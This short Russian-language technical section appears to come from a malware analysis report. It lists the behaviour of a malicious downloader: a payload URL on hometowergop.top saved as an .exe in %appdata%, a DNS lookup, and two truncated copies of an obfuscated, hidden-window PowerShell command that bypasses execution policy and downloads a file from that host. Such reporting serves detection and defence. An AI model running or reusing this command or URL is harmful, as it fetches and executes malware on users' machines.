Техническая информация
- http://www.hometowergop.top/admin.php?f=1.jpg как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^Wers^h^E^Ll.exE ^-^eXE^C^Ut^Ionp^OLi^Cy bY^p^aSs^ -NOPRO^fIl^e^ -^Wi^N^dow^S^TYLe ^hiD^DEn (Ne^w-^ob^JECT s^ys^tem.^N^Et.W^eBc^lI^en^t)^.DO^Wnl^oa^dFile(^'http://www.hometow...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "Po^Wers^h^E^Ll.exE ^-^eXE^C^Ut^Ionp^OLi^Cy bY^p^aSs^ -NOPRO^fIl^e^ -^Wi^N^dow^S^TYLe ^hiD^DEn (Ne^w-^ob^JECT s^ys^tem.^N^Et.W^eBc^lI^en^t)^.DO^Wnl^oa^dFile(^'http://www.hometow...' (со скрытым окном)